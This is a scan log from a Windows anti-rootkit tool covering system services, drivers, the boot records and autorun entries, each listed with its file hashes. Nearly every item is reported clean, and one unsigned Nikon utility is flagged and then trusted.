12:55:06.0384 0x1004 [ 6EE394F8BFDC59D51E1C347246867004, DDD2A7CF321A4EF0BA2F87EDA61E477CBC8A63D99D52CDBFA71CA28140DA780D ] UNS C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
12:55:06.0400 0x1004 UNS - ok
12:55:06.0446 0x1004 [ C98493DD8E6A50154FAC75C15E1C36BB, CECD1C826C8F7AF05468871BF6A0ACDBB6B0202F4F87F48C6D367E5BD699E800 ] upnphost C:\WINDOWS\System32\upnphost.dll
12:55:06.0478 0x1004 upnphost - ok
12:55:06.0509 0x1004 [ FF78D053A05E5A394F4E3C1816CC65A8, 5DAE02414271231F5FDBB751AFEB99874779B467947020815D4AE54432D4269D ] usbccgp C:\WINDOWS\System32\drivers\usbccgp.sys
12:55:06.0525 0x1004 usbccgp - ok
12:55:06.0540 0x1004 [ 0139248F6B95CF0D837B5B46A2722D40, 38E3E704E0364F07732DB418AEBD126B040FB3CDB7D78EA36E8605D50D528A80 ] usbcir C:\WINDOWS\System32\drivers\usbcir.sys
12:55:06.0572 0x1004 usbcir - ok
12:55:06.0618 0x1004 [ C996CBEF922B5653A01E3F50DDCE2F86, 231EB5A36E7EE242197E796D3B4AB12F945D2C8570587BC8D57D45530A0C59B4 ] usbehci C:\WINDOWS\System32\drivers\usbehci.sys
12:55:06.0634 0x1004 usbehci - ok
12:55:06.0775 0x1004 [ CD81683F4553677B9BF5163A922153EB, 6B304B0D68B9BFF0245EC755CDAAF9DF59DF3A081727E32CB66672929F0DBC50 ] usbhub C:\WINDOWS\System32\drivers\usbhub.sys
12:55:06.0806 0x1004 usbhub - ok
12:55:06.0900 0x1004 [ 5C90D5379B53590FBB24BBAD4FA682EE, DC036340510C1C0999AB1CB845F8E6EB8B7696BAC9BBE6E936454C0000D1E9D4 ] USBHUB3 C:\WINDOWS\System32\drivers\UsbHub3.sys
12:55:06.0931 0x1004 USBHUB3 - ok
12:55:06.0962 0x1004 [ A0F0484C97D6441ED6A75D7426ECCC9E, FF928ADE1C5464E581BF929F7383D5762D110EA6C7E31A6F0887EA7357ADBEFE ] usbohci C:\WINDOWS\System32\drivers\usbohci.sys
12:55:06.0993 0x1004 usbohci - ok
12:55:07.0009 0x1004 [ 4D655E3B684BE9B0F7FFD8A2935C348C, 3A7FC1748C5AEA8CFE0E7C22ADC77E3DCA475455FC16D9C6A5C16EB5E949A516 ] usbprint C:\WINDOWS\System32\drivers\usbprint.sys
12:55:07.0072 0x1004 usbprint - ok
12:55:07.0087 0x1004 [ 0F030491BA4A27BD46F8B8ACEEE83F1A, 7063855611BEF94D4D229BA1BE507ECBDD89F5861641A407EB3E2919A352F9D4 ] usbscan C:\WINDOWS\system32\DRIVERS\usbscan.sys
12:55:07.0103 0x1004 usbscan - ok
12:55:07.0150 0x1004 [ 9D168BFA334D47BE404367EB58D4E130, 23279CBE6ACBD074E7B268BA2EDA14E2255C41F8117173B2BBE653D8259ECFA2 ] USBSTOR C:\WINDOWS\System32\drivers\USBSTOR.SYS
12:55:07.0165 0x1004 USBSTOR - ok
12:55:07.0181 0x1004 [ FC974B03C8B87455F44F734C8F31A3C8, D69F6EE8030F7DF96FF151D9EAA6AE65417ACAC5A267C7DB96E9611D5BC42D2C ] usbuhci C:\WINDOWS\System32\drivers\usbuhci.sys
12:55:07.0212 0x1004 usbuhci - ok
12:55:07.0243 0x1004 [ 5C8F604F6DC74177CDD8372D7B1ADFF0, C1DE9A37A7A01CCCBFCE13C1E5B26683F620AB21EDA5A14C82022E2F49C84484 ] usbvideo C:\WINDOWS\System32\Drivers\usbvideo.sys
12:55:07.0290 0x1004 usbvideo - ok
12:55:07.0368 0x1004 [ 44603DA5A87FB491EF59C889EBBB4DDB, 59AA9B6B0B5D66F9312CD3F999D0D9F12F1A2C5D230365AD7287CD71FD86961C ] USBXHCI C:\WINDOWS\System32\drivers\USBXHCI.SYS
12:55:07.0384 0x1004 USBXHCI - ok
12:55:07.0400 0x1004 [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] VaultSvc C:\WINDOWS\system32\lsass.exe
12:55:07.0415 0x1004 VaultSvc - ok
12:55:07.0462 0x1004 [ FEB26E3B8345A7E8D62F945C4AE86562, 3AAFE87C402FC8E92542DFE60EC9540559863065F88D429A16D7B1BF829223FF ] vdrvroot C:\WINDOWS\system32\drivers\vdrvroot.sys
12:55:07.0478 0x1004 vdrvroot - ok
12:55:07.0540 0x1004 [ 8A4D808D1EC7C1C47B2C8BF488A9A07A, 63C07312ADB6F8A8BDE93361C30AC63DAB4DE1141AF54630EEF11E54B0BF983D ] vds C:\WINDOWS\System32\vds.exe
12:55:07.0603 0x1004 vds - ok
12:55:07.0634 0x1004 [ A026EDEAA5EECAE0B08E2748B616D4BD, 2525A54DC7F49DDFBB999C22BF3FAB6D9E9F70C0806E58D81E90AC59F9F46089 ] VerifierExt C:\WINDOWS\system32\drivers\VerifierExt.sys
12:55:07.0650 0x1004 VerifierExt - ok
12:55:07.0681 0x1004 [ F6ECFD6128A16A4851CFE98D4E01B011, C349893E8D7FB9B510A3FAD040F70C3C72B0ACDD5F6EB336951849F9E953717D ] vhdmp C:\WINDOWS\System32\drivers\vhdmp.sys
12:55:07.0712 0x1004 vhdmp - ok
12:55:07.0743 0x1004 [ 06D38968028E9AB19DE9B618C7B6D199, 62022297A47F440D1C82CA0B0E57C0C8E9D5033D83DD3B40492B218DF65EBF68 ] viaide C:\WINDOWS\system32\drivers\viaide.sys
12:55:07.0743 0x1004 viaide - ok
12:55:07.0775 0x1004 [ 511AD3FF957A0127E6BD336FF6F89C38, 55325BFD0857A1204F7F6F8ED8C91C07B0E20A50402105708E7365ECD9E25A21 ] vmbus C:\WINDOWS\system32\drivers\vmbus.sys
12:55:07.0790 0x1004 vmbus - ok
12:55:07.0822 0x1004 [ DA40BEA0A863CE768C940CA9723BF81F, 567C0C3F422325635808B0CF76E05D3B6187F96845C33F85F92F98C9FE53A5B8 ] VMBusHID C:\WINDOWS\System32\drivers\VMBusHID.sys
12:55:07.0837 0x1004 VMBusHID - ok
12:55:07.0853 0x1004 [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicguestinterface C:\WINDOWS\System32\ICSvc.dll
12:55:07.0884 0x1004 vmicguestinterface - ok
12:55:07.0900 0x1004 [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicheartbeat C:\WINDOWS\System32\ICSvc.dll
12:55:07.0915 0x1004 vmicheartbeat - ok
12:55:07.0931 0x1004 [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmickvpexchange C:\WINDOWS\System32\ICSvc.dll
12:55:07.0962 0x1004 vmickvpexchange - ok
12:55:07.0978 0x1004 [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicrdv C:\WINDOWS\System32\ICSvc.dll
12:55:07.0993 0x1004 vmicrdv - ok
12:55:08.0009 0x1004 [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicshutdown C:\WINDOWS\System32\ICSvc.dll
12:55:08.0040 0x1004 vmicshutdown - ok
12:55:08.0056 0x1004 [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmictimesync C:\WINDOWS\System32\ICSvc.dll
12:55:08.0072 0x1004 vmictimesync - ok
12:55:08.0087 0x1004 [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicvss C:\WINDOWS\System32\ICSvc.dll
12:55:08.0118 0x1004 vmicvss - ok
12:55:08.0134 0x1004 [ 55D7D963DE85162F1C49721E502F9744, 5AD34D6DB707EF3E5242BD8CA67B21D6258EE7E7FC477D5227BD15500AE7F45F ] volmgr C:\WINDOWS\system32\drivers\volmgr.sys
12:55:08.0134 0x1004 volmgr - ok
12:55:08.0150 0x1004 [ CCB9E901F7254BF96D28EB1B0E5329B7, F0E3CA4EFA544CDAEF4092284CF3EC7DF07F806A770285E281816457AD8813F5 ] volmgrx C:\WINDOWS\system32\drivers\volmgrx.sys
12:55:08.0181 0x1004 volmgrx - ok
12:55:08.0212 0x1004 [ 64CA2B4A49A8EAF495E435623ECCE7DB, 81151F295A54DE2B8B88C7F48C86BF58CDFF96F98493509C06D6F41484594386 ] volsnap C:\WINDOWS\system32\drivers\volsnap.sys
12:55:08.0243 0x1004 volsnap - ok
12:55:08.0275 0x1004 [ EF31713EE4C7CCFE4049F7E7F15645A2, 35D198D3F1061E19A7EF89FA1E75377049CD6BCA9702F8076B9F95BB8737E0D4 ] vpci C:\WINDOWS\System32\drivers\vpci.sys
12:55:08.0290 0x1004 vpci - ok
12:55:08.0322 0x1004 [ 4539F45F9F4C9757A86A56C949421E07, DEC362314B2C66414F39354AFE79C02B18BF4EEF90787FB58307F6EB62237E2C ] vsmraid C:\WINDOWS\system32\drivers\vsmraid.sys
12:55:08.0337 0x1004 vsmraid - ok
12:55:08.0400 0x1004 [ 3B7F9612439EA47151EC5EAB232C1C3F, CA08CCB14CB46512F72E2C20454242B18BC57E34C55B42A37B7EC27B79242CDC ] VSS C:\WINDOWS\system32\vssvc.exe
12:55:08.0478 0x1004 VSS - ok
12:55:08.0493 0x1004 [ 0849B7260F26FE05EA56DED0672E2F4B, 7EAC0E7988F45CB4133A15932955B7B03CE715C967A3BAC9999D81543EBCAEC5 ] VSTXRAID C:\WINDOWS\system32\drivers\vstxraid.sys
12:55:08.0525 0x1004 VSTXRAID - ok
12:55:08.0556 0x1004 [ BE970C369E43B509C1EDA2B8FA7CECB0, 18951F2AA842A0795AA79A4E164EE925A35E6270EBE4C4CDB19D0A891830E383 ] vwifibus C:\WINDOWS\System32\drivers\vwifibus.sys
12:55:08.0587 0x1004 vwifibus - ok
12:55:08.0618 0x1004 [ 35BF5C5F5E3C9902C98978C7640574DA, C61E50B04000DCEC72365723F0C0725C2E005529DAF2777A59E624C14DA29E55 ] vwififlt C:\WINDOWS\system32\DRIVERS\vwififlt.sys
12:55:08.0665 0x1004 vwififlt - ok
12:55:08.0681 0x1004 [ 65ED7B9CFEA893DF7748D5FF692690DE, 73AB9D8BB928B3247BDFC7BB47AD7FCA763B375DC250C251DB4E0573531040E8 ] vwifimp C:\WINDOWS\system32\DRIVERS\vwifimp.sys
12:55:08.0697 0x1004 vwifimp - ok
12:55:08.0743 0x1004 [ DC821E811EFBB65CDD77FBB8B6ECA385, B7C8AACDF81DBA298F2F384983D36B269876C31F0398D89BF9070217A069B96F ] W32Time C:\WINDOWS\system32\w32time.dll
12:55:08.0775 0x1004 W32Time - ok
12:55:08.0806 0x1004 [ 0910AB9ED404C1434E2D0376C2AD5D8B, 62585CA5F1375BDA440D28D5DF1ADDC9DE3DDFA196D49BBFF3456A5A09EE1C6B ] WacomPen C:\WINDOWS\System32\drivers\wacompen.sys
12:55:08.0837 0x1004 WacomPen - ok
12:55:08.0853 0x1004 [ B41F3E5780D97CFD44A717153AD9CF2C, 6133104D9E5BCFDCDF55E3C52AA701766102A8F86D3F2667BBBF7168E3B3E2AB ] Wanarp C:\WINDOWS\system32\DRIVERS\wanarp.sys
12:55:08.0868 0x1004 Wanarp - ok
12:55:08.0884 0x1004 [ B41F3E5780D97CFD44A717153AD9CF2C, 6133104D9E5BCFDCDF55E3C52AA701766102A8F86D3F2667BBBF7168E3B3E2AB ] Wanarpv6 C:\WINDOWS\system32\DRIVERS\wanarp.sys
12:55:08.0884 0x1004 Wanarpv6 - ok
12:55:09.0009 0x1004 [ A81988DCC4FA440AA88B84CA452F5E22, 3573AAA09971E8ADB6FEFA778E02B2D8EE5E4249267CF37A524D9F019CC836FB ] wbengine C:\WINDOWS\system32\wbengine.exe
12:55:09.0103 0x1004 wbengine - ok
12:55:09.0150 0x1004 [ 0F1DFA2FED73FA78B8C3CDE332A870F6, 1089F6F585F5350D349A640EBD3117832DF6B3657EB6667CB00AE217E04ACA17 ] WbioSrvc C:\WINDOWS\System32\wbiosrvc.dll
12:55:09.0181 0x1004 WbioSrvc - ok
12:55:09.0212 0x1004 [ 0EAEC313B24837613621B4A2536ED382, 61C194ED7FA7D65BBE61A546D5FCA52F52AB08324E084D3EC23C9706E9BF0175 ] Wcmsvc C:\WINDOWS\System32\wcmsvc.dll
12:55:09.0228 0x1004 Wcmsvc - ok
12:55:09.0275 0x1004 [ F6B4C2280FF7C7156AC8A4687B9DA35E, 1899D584D7469BB49355D84080051E2575B033E6312009D9C6C1DD3F7F9AA4C5 ] wcncsvc C:\WINDOWS\System32\wcncsvc.dll
12:55:09.0306 0x1004 wcncsvc - ok
12:55:09.0337 0x1004 [ B7BF1D783F5B2484E8CE1C0C78257F16, 468601199FCCF63DBAE86EE6B8825EA85B2A1EE177413353FFA2CC9CA5249FCD ] WcsPlugInService C:\WINDOWS\System32\WcsPlugInService.dll
12:55:09.0384 0x1004 WcsPlugInService - ok
12:55:09.0415 0x1004 [ 81285DDC994F03379DB46419300B2DCB, 98D3622E11F375718AEA1DE3B5F0104DDAB4F96B6D4C19788C14F7B338A6F235 ] WdBoot C:\WINDOWS\system32\drivers\WdBoot.sys
12:55:09.0431 0x1004 WdBoot - ok
12:55:09.0509 0x1004 [ CB6C63FF8342B467E2EF76E98D5B934D, BE017CE91E3BAB293DE6ECF143797CCE3F33CC63024437472B4E38C6961AD884 ] Wdf01000 C:\WINDOWS\system32\drivers\Wdf01000.sys
12:55:09.0556 0x1004 Wdf01000 - ok
12:55:09.0556 0x1004 [ 26B8FED3F3B85F5F0C4BD03FD00B9941, 7F94FE7954498223B33C025258DB588A3AC9FF25C58EEAD204514FD20652FE40 ] WdFilter C:\WINDOWS\system32\drivers\WdFilter.sys
12:55:09.0587 0x1004 WdFilter - ok
12:55:09.0634 0x1004 [ F581F9C9D6953FABFA24E67105F0B614, 5A7BB72523D1C53BBE68700537D7AE0D150BC7E4B8227A916B2E29EE4CA267A9 ] WdiServiceHost C:\WINDOWS\system32\wdi.dll
12:55:09.0665 0x1004 WdiServiceHost - ok
12:55:09.0665 0x1004 [ F581F9C9D6953FABFA24E67105F0B614, 5A7BB72523D1C53BBE68700537D7AE0D150BC7E4B8227A916B2E29EE4CA267A9 ] WdiSystemHost C:\WINDOWS\system32\wdi.dll
12:55:09.0681 0x1004 WdiSystemHost - ok
12:55:09.0728 0x1004 [ CE67080F00E0AF32755096CEA6430ABA, 0E5D626F9F76C0BC63B2D246AD66D9CBF7D92F34B56398417BCFD0C331DBD282 ] WdNisDrv C:\WINDOWS\system32\Drivers\WdNisDrv.sys
12:55:09.0744 0x1004 WdNisDrv - ok
12:55:09.0775 0x1004 WdNisSvc - ok
12:55:09.0806 0x1004 [ 40F83492DB9ABBA59773A45FB487C8B2, 0D0DE0B0C9B929FEFD2674CCF17F5F2FC4B16EAB8E1981BBCE51B0305FD7D75E ] WebClient C:\WINDOWS\System32\webclnt.dll
12:55:09.0853 0x1004 WebClient - ok
12:55:09.0900 0x1004 [ 384E1D04FE20845B2559D292F17A9FA1, AD3B0B2B2219691AC30FEEC8AFDB3BBB74B51BB7D02038AE2B4DEA514E245315 ] Wecsvc C:\WINDOWS\system32\wecsvc.dll
12:55:09.0931 0x1004 Wecsvc - ok
12:55:09.0962 0x1004 [ 455014F4E48B67EBE0F032E2B0E06BF2, A36435784A034B27056A0E606683A20C69F1B0AB2B6BAEDEAEAA190F6287CAEF ] WEPHOSTSVC C:\WINDOWS\system32\wephostsvc.dll
12:55:09.0994 0x1004 WEPHOSTSVC - ok
12:55:10.0025 0x1004 [ F13DBA57CEA9B7074B95EDCA6AD2635E, 1D9BA4841EF1343A5D9096B5FE27FC65DC1901D6683DD13516171638549666B5 ] wercplsupport C:\WINDOWS\System32\wercplsupport.dll
12:55:10.0087 0x1004 wercplsupport - ok
12:55:10.0119 0x1004 [ FD7E58B6AA3EABF2D12B9762A20E11E4, 4C5E2E246C5C70074866BB3DBC2AAF483ECE4345004CCB8D1FE285047268685D ] WerSvc C:\WINDOWS\System32\WerSvc.dll
12:55:10.0134 0x1004 WerSvc - ok
12:55:10.0165 0x1004 [ 715ABA3DD164D06457A2A3C92F6EA9D5, E6F8269D2FFC4A548B65724C0A3F53756ED15E47229861FBD40B656EE40FE166 ] WFPLWFS C:\WINDOWS\system32\DRIVERS\wfplwfs.sys
12:55:10.0181 0x1004 WFPLWFS - ok
12:55:10.0212 0x1004 [ 8C840E1FD7584E74BD0CC1EA581EC187, 148E534A94B4882E7396B13FABE17407802292E7890713540080D03D5629C81D ] WiaRpc C:\WINDOWS\System32\wiarpc.dll
12:55:10.0244 0x1004 WiaRpc - ok
12:55:10.0275 0x1004 [ 5F66B7BB330AA80067FC66149A692620, 92C5D7115A168A23108B65EEEB5FBA8FA43D781855355792596D2419160263C2 ] WIMMount C:\WINDOWS\system32\drivers\wimmount.sys
12:55:10.0290 0x1004 WIMMount - ok
12:55:10.0290 0x1004 WinDefend - ok
12:55:10.0369 0x1004 [ 10DAD6A7FC617A221313BD584E3C3A00, F139B878668ECF38FE59831E8595A207D5CEEE76C6FFDA8C9F735435E601A763 ] WinHttpAutoProxySvc C:\WINDOWS\system32\winhttp.dll
12:55:10.0415 0x1004 WinHttpAutoProxySvc - ok
12:55:10.0478 0x1004 [ FC8BD690321216C32BB58B035B6D5674, D61698DB19D9DB2593B60B6BA13F7B7735667206F41D751D507135469D6D3CDD ] Winmgmt C:\WINDOWS\system32\wbem\WMIsvc.dll
12:55:10.0525 0x1004 Winmgmt - ok
12:55:10.0634 0x1004 [ 75436315AA383CF527695C6D49D0CA59, E3D55F2ACBD45D4D031FA6CA799394459C89BE50FF6ADE4FE36F2CAB2D2E63D0 ] WinRM C:\WINDOWS\system32\WsmSvc.dll
12:55:10.0744 0x1004 WinRM - ok
12:55:10.0775 0x1004 [ 3AF1FA17F1C4ACBDB660D8F98B1A9C13, 99B0851410B462685F6705EBF832D10943FB9634030B02D15BF5D0C66F26F2C2 ] WinUsb C:\WINDOWS\System32\drivers\WinUsb.sys
12:55:10.0822 0x1004 WinUsb - ok
12:55:10.0869 0x1004 [ DC079BA8390089E4EBCA63D27EEA3ECB, 4D549217A68292E2B16C09FD9F84317011EE54A2DAF4E2AB85554267DF0D3249 ] WlanSvc C:\WINDOWS\System32\wlansvc.dll
12:55:10.0931 0x1004 WlanSvc - ok
12:55:10.0994 0x1004 [ 06BF5897949A8F24893F792E876B71F5, 9D3719492A86BF52A56E2EA798FD6FDB5862A03F6D360FCC4B0CEA9BE9792AE4 ] wlidsvc C:\WINDOWS\system32\wlidsvc.dll
12:55:11.0056 0x1004 wlidsvc - ok
12:55:11.0103 0x1004 [ 2834D9D3B4F554A39C72F00EA3F0E128, D10124343C67FE9A0B711AD569BB8080495FCEA0ECEF9AC3F3FBD6865F436A44 ] WmiAcpi C:\WINDOWS\System32\drivers\wmiacpi.sys
12:55:11.0134 0x1004 WmiAcpi - ok
12:55:11.0197 0x1004 [ B96F7A1236C3F21212DE2C40A3DDB005, 5A29EBB6DA036E303611EB1304192655021405BB05452FD37886DDE604FF0D9D ] wmiApSrv C:\WINDOWS\system32\wbem\WmiApSrv.exe
12:55:11.0212 0x1004 wmiApSrv - ok
12:55:11.0244 0x1004 WMPNetworkSvc - ok
12:55:11.0259 0x1004 [ 7FC5667DF73D4B04AA457CC3A4180E09, CB7B014945DCA16B6D120DBE0E5876C4C867A4ACD3C3536AEADC14B908613D4E ] Wof C:\WINDOWS\system32\drivers\Wof.sys
12:55:11.0275 0x1004 Wof - ok
12:55:11.0353 0x1004 [ 588040D595BBF0856CA1ADD941A8ED17, CBC92BB5453FE1BEA6F33239B7CE884F312559591383408EA5F95A006156C5D3 ] workfolderssvc C:\WINDOWS\system32\workfolderssvc.dll
12:55:11.0447 0x1004 workfolderssvc - ok
12:55:11.0525 0x1004 [ A2468CC3509394A33C4C32F99563D845, 62690C7D41F382DF74B8F4B942647842858E37DE35FF2DE028192E4D09ABB2C5 ] wpcfltr C:\WINDOWS\system32\DRIVERS\wpcfltr.sys
12:55:11.0541 0x1004 wpcfltr - ok
12:55:11.0587 0x1004 [ 19F4DF69876DA7E9C4965351560FE6B7, 127247A7964F55EE3AF842D25120F5ACD387632BEE2BF3D28FAC05840CEA19BA ] WPCSvc C:\WINDOWS\System32\wpcsvc.dll
12:55:11.0619 0x1004 WPCSvc - ok
12:55:11.0650 0x1004 [ 2ADE11F3D84709C5F6781E4C59F11683, F003C43396CF8FCF44EAB87583650DB4D2A233322D28D6A78D1694945D9073BB ] WPDBusEnum C:\WINDOWS\system32\wpdbusenum.dll
12:55:11.0681 0x1004 WPDBusEnum - ok
12:55:11.0697 0x1004 [ 9F2904B55F6CECCD1A8D986B5CE2609A, E19ED4DD3CEF3A22C058FC324824604FB3FC98A029C94E6C2A3389F938D680B6 ] WpdUpFltr C:\WINDOWS\system32\drivers\WpdUpFltr.sys
12:55:11.0712 0x1004 WpdUpFltr - ok
12:55:11.0728 0x1004 [ AE072B0339D0A18E455DC21666CAD572, AB1DAEA25E2C7AD610818D4B4783F6D4190D85EBB3963BBAD410E8CEA7899EDB ] ws2ifsl C:\WINDOWS\system32\drivers\ws2ifsl.sys
12:55:11.0744 0x1004 ws2ifsl - ok
12:55:11.0791 0x1004 [ 501D5EFAB9711039479AE48401386D2B, C8C1184DE93E9D2C4E8A60E4E9980745C4E5470E5DA9B59165D18705330ADEFE ] wscsvc C:\WINDOWS\System32\wscsvc.dll
12:55:11.0837 0x1004 wscsvc - ok
12:55:11.0837 0x1004 [ F586F3F1BF962FE9AE4316E0D896B22F, 8D0AD48D79294567123D943D0F5B6D5A32D7A82B129A24DC821D3095AFAA100B ] WSDPrintDevice C:\WINDOWS\System32\drivers\WSDPrint.sys
12:55:11.0853 0x1004 WSDPrintDevice - ok
12:55:11.0869 0x1004 [ 58035FD3369879E02D65989C44D27450, B9245DB5C17F7CE94FAA20AB4B0D06A4DFB6133C6E82343758CDC713EB64DFEF ] WSDScan C:\WINDOWS\System32\drivers\WSDScan.sys
12:55:11.0900 0x1004 WSDScan - ok
12:55:11.0900 0x1004 WSearch - ok
12:55:12.0072 0x1004 [ 6B2D71124C1EA86B74412F414C42431D, 078CC6C9667EF6BDA3E6900BC26A5A5B030CAA66928A6BBB7B7DC43C5C199EDC ] WSService C:\WINDOWS\System32\WSService.dll
12:55:12.0228 0x1004 WSService - ok
12:55:12.0369 0x1004 [ 020F47C655ED1F63BBA834AA53575D5C, 7E36BB83B937CEA8B5D1EAF1DF63D32D64CA8045DA377DF5237D2F4DC16574CC ] wuauserv C:\WINDOWS\system32\wuaueng.dll
12:55:12.0556 0x1004 wuauserv - ok
12:55:12.0603 0x1004 [ 481286719402E4BAEFEA0604AB1B5113, F3CF65DF2AB39F79AE4C1335831408418E40726706E0242677E8B96B0FAD988F ] WudfPf C:\WINDOWS\system32\drivers\WudfPf.sys
12:55:12.0697 0x1004 WudfPf - ok
12:55:12.0712 0x1004 [ D7B4859227B02BCC1055B279A63C937F, 82C99844CC596C2723523B1B98573488FF23337947B78AA04BA21E58394BB751 ] WUDFRd C:\WINDOWS\System32\drivers\WUDFRd.sys
12:55:12.0744 0x1004 WUDFRd - ok
12:55:12.0759 0x1004 [ D7B4859227B02BCC1055B279A63C937F, 82C99844CC596C2723523B1B98573488FF23337947B78AA04BA21E58394BB751 ] WUDFSensorLP C:\WINDOWS\System32\drivers\WUDFRd.sys
12:55:12.0775 0x1004 WUDFSensorLP - ok
12:55:12.0806 0x1004 [ 51D28F7F1F888DDCF2C67DCF3B79A5D3, 74FF2936AFCEB9A36175D5B00EB91A5AD614B52BE3FB3FA9B994A025A484D2B7 ] wudfsvc C:\WINDOWS\System32\WUDFSvc.dll
12:55:12.0837 0x1004 wudfsvc - ok
12:55:12.0837 0x1004 [ D7B4859227B02BCC1055B279A63C937F, 82C99844CC596C2723523B1B98573488FF23337947B78AA04BA21E58394BB751 ] WUDFWpdFs C:\WINDOWS\System32\drivers\WUDFRd.sys
12:55:12.0853 0x1004 WUDFWpdFs - ok
12:55:12.0869 0x1004 [ D7B4859227B02BCC1055B279A63C937F, 82C99844CC596C2723523B1B98573488FF23337947B78AA04BA21E58394BB751 ] WUDFWpdMtp C:\WINDOWS\System32\drivers\WUDFRd.sys
12:55:12.0884 0x1004 WUDFWpdMtp - ok
12:55:12.0916 0x1004 [ A0900F8F628B5AF6841414EB3CF11E50, 8A531F2472FF4B4D895D469D28C215C834ECADBEF539894B8F3F606079A86184 ] WwanSvc C:\WINDOWS\System32\wwansvc.dll
12:55:12.0947 0x1004 WwanSvc - ok
12:55:12.0962 0x1004 ================ Scan global ===============================
12:55:13.0009 0x1004 [ 05B08C20B8428ECE088CB5635696A48D, 471642A2D0E5C3BB235962FC8D86A49AC30D7DDE80B97E348425BBFCDE4DCDC3 ] C:\WINDOWS\system32\basesrv.dll
12:55:13.0056 0x1004 [ EAB311B0A7A8EA0346F14F08D4BC8F46, 11168E4074679F8A69DA714C0ABD0C68BA49D171B379343F14783C9C563202CA ] C:\WINDOWS\system32\winsrv.dll
12:55:13.0087 0x1004 [ 3600ED7EA8AED849E20700551C0BD63B, 4A8C346C1646E80B58EF93F87F915A41E05CA2E993BB1C96955AE62A0669AF66 ] C:\WINDOWS\system32\sxssrv.dll
12:55:13.0119 0x1004 [ E0C7813A97CA7947FF5C18A8F3B61A45, 083BB4F3B20419C87DB656F1465E5F782ACDE76838CDE6207F26AAD035C69DE0 ] C:\WINDOWS\system32\services.exe
12:55:13.0134 0x1004 [ Global ] - ok
12:55:13.0134 0x1004 ================ Scan MBR ==================================
12:55:13.0134 0x1004 [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk0\DR0
12:55:13.0212 0x1004 \Device\Harddisk0\DR0 - ok
12:55:13.0212 0x1004 ================ Scan VBR ==================================
12:55:13.0244 0x1004 [ C4324B2D23C8414CCC18BEBA48FD9C22 ] \Device\Harddisk0\DR0\Partition1
12:55:13.0275 0x1004 \Device\Harddisk0\DR0\Partition1 - ok
12:55:13.0275 0x1004 [ 64F3D15DBF257043A337B56F52EB68E7 ] \Device\Harddisk0\DR0\Partition2
12:55:13.0291 0x1004 \Device\Harddisk0\DR0\Partition2 - ok
12:55:13.0306 0x1004 [ B1E27AA018409DE6BFD73F8AFB883A65 ] \Device\Harddisk0\DR0\Partition3
12:55:13.0306 0x1004 \Device\Harddisk0\DR0\Partition3 - ok
12:55:13.0322 0x1004 [ 67412939B997C98E2CB5A53654AA1CE1 ] \Device\Harddisk0\DR0\Partition4
12:55:13.0337 0x1004 \Device\Harddisk0\DR0\Partition4 - ok
12:55:13.0369 0x1004 [ 3A8719D39E4BDB228D6A98CD821E38E7 ] \Device\Harddisk0\DR0\Partition5
12:55:13.0384 0x1004 \Device\Harddisk0\DR0\Partition5 - ok
12:55:13.0400 0x1004 [ 2EE8017EB06567247739F064A4387423 ] \Device\Harddisk0\DR0\Partition6
12:55:13.0400 0x1004 \Device\Harddisk0\DR0\Partition6 - ok
12:55:13.0400 0x1004 ================ Scan generic autorun ======================
12:55:13.0822 0x1004 [ 6EEAF19A5D61F8CA23F233D9D3D7CE0F, 421730288CF409AC650ADB70A1A8B619BE4640E45DC56C7355B64D97BD425218 ] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
12:55:14.0213 0x1004 RtHDVCpl - ok
12:55:14.0275 0x1004 [ 45D629AAF007A0DED6689A7A031D2AC7, DD10DEA927A2CC16EE38765DD1DE45E88288C09923DC14A95C1C6E457D535BCC ] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
12:55:14.0322 0x1004 RtHDVBg_Dolby - ok
12:55:14.0338 0x1004 [ 7C92202C43FF457EF2CEE7301973E3BA, DD89F47243DC84CBCDA6624A1CCEC22822EA4F3B8B75260D062713AB22A03FF4 ] C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
12:55:14.0369 0x1004 Samsung Link - ok
12:55:14.0416 0x1004 AdobeAAMUpdater-1.0 - ok
12:55:14.0463 0x1004 [ 901AA7A38CE13F14B6BBEC38C0595698, 1E95F2048E2A1782807D52E9816ED267355718E24D01FF07ACE73D965EDE388A ] C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe
12:55:14.0478 0x1004 BCSSync - ok
12:55:14.0541 0x1004 [ 3B104EE76B142ECDFCD38ED80F0098A5, EFDB2B48255A2928B13BE922CD40FD18A12102A397036DDF2BE9C2160359695E ] C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe
12:55:14.0588 0x1004 Nikon Message Center 2 - detected UnsignedFile.Multi.Generic ( 1 )
12:55:17.0041 0x1004 Detect skipped due to KSN trusted
12:55:17.0041 0x1004 Nikon Message Center 2 - ok
12:55:17.0197 0x1004 [ 5DCCD49BF96D2B87F04ECB1671B85A4C, 16739D879B344542014FC5E1AFEAFD4FE0CD24CF8D891037C20D47F543D0B37A ] C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
12:55:17.0291 0x1004 Adobe Creative Cloud - ok
12:55:17.0291 0x1004 SunJavaUpdateSched - ok
